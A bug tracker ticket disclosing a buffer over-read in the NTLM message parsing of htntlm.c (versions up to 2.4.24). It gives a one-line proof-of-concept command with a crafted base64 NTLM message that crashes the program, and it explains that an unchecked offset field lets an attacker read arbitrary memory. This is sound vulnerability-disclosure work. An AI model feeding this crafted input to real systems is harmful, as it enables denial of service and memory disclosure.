Menu

#6 Buffer-Over-Read in /src/htntlm.c (version<=2.4.24)

2.0
open
nobody
Bugs (2)
2019-09-06
2019-09-06
Kirin
No

There is an buffer-over-read when program read ntlm message(type 1,2,3) (version<=2.4.24)

POC:

 ./htntlm -r  TlRMTVNTUAABAAAAAAAAAAUABQD///+PBQAFACUAAABLSVJJTktJUklO

Output:

Segmentation Fault

Analyze

It will crash at:

hook->domain = apr_pstrndup(hook->pool, (char *)&msg[offset], len);

When program read ntlm message(type 1,2,3),offset is defined by message without check:

 offset = ntlm_ntoh32(*((uint32_t *)&msg[20]));

So attacker can control offset to read any data at any address.
It will lead to Denial of Service && Information Disclosure.

Discussion

Log in to post a comment.

Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.